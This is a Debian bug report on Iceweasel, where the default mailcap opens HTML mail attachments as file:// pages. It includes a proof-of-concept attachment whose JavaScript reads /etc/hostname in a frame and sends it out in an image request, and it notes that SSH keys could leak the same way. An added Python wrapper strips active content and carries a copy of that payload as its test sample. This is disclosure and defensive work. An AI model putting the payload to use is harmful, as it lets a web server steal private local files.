Package: iceweasel
Version: 2.0.0.4-1
Severity: grave
Tags: security
Justification: user security hole

The default /etc/mailcap entry makes iceweasel be called directly
to view HTML files with a "file://" URL. Due to Mozilla bug 230606
(or 382637, on which the attached example is based), data readable
by the user can be sent to a remote web server.

For instance, on my machine, after saving the attached mail file and
removing my personal ~/.mailcap file (to use Debian's):

$ mutt -f exploit-file

I type 'v', down, enter to view the attached exploit-file.html file
with Iceweasel. /var/log/apache2/error.log now contains:

[Fri Jun 15 17:45:11 2007] [error] [client 127.0.0.1] File does not exist: /var/www/vin

This example just provides the hostname (value of /etc/hostname) to
the local web server, but one can provide more private information
(such as the contents of the user's .ssh/id_rsa or the contents of
/etc/passwd) to any remote web server (this needs a bit more JavaScript
to transform the data into a URL, though).

A possible fix is to pass the data first to a wrapper that will clean
up the HTML file (i.e. remove scripts), or, if one still wants to be able
to run scripts, store the file in some place where an
"http://localhost/..." URL can be used (the user must have a local web
server installed).

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.18-4-686-bigmem (SMP w/2 CPU cores)
Locale: LANG=POSIX, LC_CTYPE=en_US.ISO8859-1 (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages iceweasel depends on:
ii  debianutils             2.21             Miscellaneous utilities specific t
ii  fontconfig              2.4.2-1.2        generic font configuration library
ii  libatk1.0-0             1.18.0-2         The ATK accessibility toolkit
ii  libc6                   2.5-11           GNU C Library: Shared libraries
ii  libcairo2               1.4.6-1.1        The Cairo 2D vector graphics libra
ii  libfontconfig1          2.4.2-1.2        generic font configuration library
ii  libfreetype6            2.2.1-6          FreeType 2 font engine, shared lib
ii  libgcc1                 1:4.2-20070609-1 GCC support library
ii  libglib2.0-0            2.12.12-1        The GLib library of C routines
ii  libgtk2.0-0             2.10.13-1        The GTK+ graphical user interface 
ii  libhunspell-1.1-0       1.1.5-6          spell checker and morphological an
ii  libjpeg62               6b-13            The Independent JPEG Group's JPEG 
ii  libnspr4-0d             4.6.6-3          NetScape Portable Runtime Library
ii  libnss3-0d              3.11.5-3         Network Security Service libraries
ii  libpango1.0-0           1.16.4-1         Layout and rendering of internatio
ii  libpng12-0              1.2.15~beta5-2   PNG library - runtime
ii  libstdc++6              4.2-20070609-1   The GNU Standard C++ Library v3
ii  libx11-6                2:1.0.3-7        X11 client-side library
ii  libxft2                 2.1.12-2         FreeType-based font drawing librar
ii  libxinerama1            1:1.0.2-1        X11 Xinerama extension library
ii  libxp6                  1:1.0.0.xsf1-1   X Printing Extension (Xprint) clie
ii  libxrender1             1:0.9.2-1        X Rendering Extension client libra
ii  libxt6                  1:1.0.5-3        X11 toolkit intrinsics library
ii  psmisc                  22.5-1           Utilities that use the proc filesy
ii  zlib1g                  1:1.2.3-15       compression library - runtime

iceweasel recommends no packages.

-- no debconf information
From [EMAIL PROTECTED] Fri Jun 15 17:32:46 2007
From: [EMAIL PROTECTED]
Subject: Exploit - see https://bugzilla.mozilla.org/show_bug.cgi?id=382637
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="9jxsPFA5p3P2qPhR"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit


--9jxsPFA5p3P2qPhR
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit

Open the HTML attachment with Firefox and look at your
/var/log/apache2/error.log (or similar).

--9jxsPFA5p3P2qPhR
Content-Type: text/html; charset=us-ascii
Content-Disposition: attachment; filename="exploit-file.html"

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">

<!-- Idea from <https://bugzilla.mozilla.org/show_bug.cgi?id=382637>.
     Open this HTML *locally* (file:// URL). -->

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Exploit</title>
<script type="text/javascript">
function fun() {
  var data = top.frames['name2'].document.body.textContent;
  var img = new Image();
  img.src = "http://localhost/" + data;
}
</script>
</head>

<frameset onload="fun()">
  <frame src="http://localhost/" name="name1"/>
  <frame src="file:///etc/hostname" name="name2"/>
</frameset>

</html>

--9jxsPFA5p3P2qPhR--

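The first fix the report suggests, a wrapper that strips scripts before the browser ever sees the attachment, worked through as an added example. This is not the reporter's code and not anything Debian ships; it assumes a ~/.mailcap entry that points at a script named safe-html-view and uses Debian's x-www-browser alternative to launch the browser. Besides <script>, it also removes frames, iframes, object/embed/applet, base and link elements, on* handlers, and javascript:/data:/file: URLs, because on a file:// document those can pull other local files into the page even without the script that would exfiltrate them. The SAMPLE string is a constructed copy of the core of the attached exploit-file.html.

```python
"""safe-html-view: hypothetical mailcap wrapper (added example) that strips
active content from an HTML attachment before a browser opens it via file://.
Assumed ~/.mailcap entry (not Debian's default):
    text/html; safe-html-view %s; test=test -n "$DISPLAY"
"""
import html
import subprocess
import sys
import tempfile
from html.parser import HTMLParser

# Elements that run code or pull another document (e.g. file:///etc/hostname)
# into this one; everything nested inside a dropped non-void element goes too.
ACTIVE = {"script", "frameset", "frame", "iframe", "object", "embed",
          "applet", "base", "link"}
VOID = {"area", "base", "br", "col", "embed", "frame", "hr", "img", "input",
        "link", "meta", "param", "source", "track", "wbr"}
URL_ATTRS = {"src", "href", "action", "background", "data", "formaction"}
UNSAFE_SCHEMES = ("javascript:", "vbscript:", "data:", "file:")

# Constructed sample: the core of the exploit-file.html attached to the report.
SAMPLE = """<html><head><title>Exploit</title><script type="text/javascript">
function fun() { new Image().src = "http://localhost/" +
  top.frames['name2'].document.body.textContent; }
</script></head><frameset onload="fun()">
  <frame src="http://localhost/" name="name1"/>
  <frame src="file:///etc/hostname" name="name2"/>
</frameset></html>"""


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=False)  # pass entities through as-is
        self.out = []      # sanitized markup, in document order
        self.skip = 0      # nesting depth while inside a dropped element
        self.dropped = []  # audit trail of what was removed

    def _clean_attrs(self, attrs):
        kept = []
        for name, value in attrs:
            lname = name.lower()
            # The parser already decoded &#x0a;-style entities in the value;
            # removing whitespace then catches "jav\nascript:" as well.
            scheme = "".join((value or "").split()).lower()
            if lname.startswith("on"):                      # onload=, onclick=
                self.dropped.append(f"@{lname}")
            elif lname in URL_ATTRS and scheme.startswith(UNSAFE_SCHEMES):
                self.dropped.append(f"@{lname}={value!r}")
            else:
                kept.append((name, value))
        return kept

    def handle_starttag(self, tag, attrs):
        if self.skip:
            self.skip += tag not in VOID
        elif tag in ACTIVE:
            self.dropped.append(f"<{tag}>")
            self.skip = int(tag not in VOID)
        else:
            parts = [tag] + [n if v is None else f'{n}="{html.escape(v)}"'
                             for n, v in self._clean_attrs(attrs)]
            self.out.append("<" + " ".join(parts) + ">")

    def handle_endtag(self, tag):
        if self.skip:
            self.skip -= tag not in VOID
        elif tag not in ACTIVE and tag not in VOID:
            self.out.append(f"</{tag}>")

    def _emit(self, text):
        if not self.skip:
            self.out.append(text)

    # Text, entities, <!DOCTYPE> and <?xml?> are copied; comments are dropped.
    def handle_data(self, data): self._emit(data)
    def handle_entityref(self, name): self._emit(f"&{name};")
    def handle_charref(self, name): self._emit(f"&#{name};")
    def handle_decl(self, decl): self._emit(f"<!{decl}>")
    def handle_pi(self, data): self._emit(f"<?{data}>")
    def handle_comment(self, data): pass


def sanitize_html(text):
    """Return (sanitized_markup, dropped_items)."""
    p = Sanitizer()
    p.feed(text)
    p.close()
    return "".join(p.out), p.dropped


if __name__ == "__main__":
    # mutt passes the saved attachment as argv[1]; the browser gets a cleaned
    # copy, since mutt deletes only its own %s file.  x-www-browser is assumed.
    with open(sys.argv[1], encoding="latin-1") as src:     # byte-transparent
        clean, dropped = sanitize_html(src.read())
    print("safe-html-view: dropped:", ", ".join(dropped), file=sys.stderr)
    with tempfile.NamedTemporaryFile("w", suffix=".html", delete=False,
                                     encoding="latin-1") as tmp:
        tmp.write(clean)
    subprocess.call(["x-www-browser", "file://" + tmp.name])
```

Run against the attached exploit this leaves only `<html><head><title>Exploit</title></head></html>`: the script and the frameset (with its file:///etc/hostname frame) are gone, so there is nothing left to read the hostname and nothing left to send it. The usual caveats for a parser-based filter apply: an unmatched end tag inside a dropped region can end the skip early, remote http:// images are still allowed (a privacy leak, not a data leak), and it does nothing about CSS url() references, so treat it as a mitigation for mail attachments rather than a general-purpose HTML sanitizer. The reporter's second option, serving the file from http://localhost/, avoids the file:// origin entirely and needs no filtering.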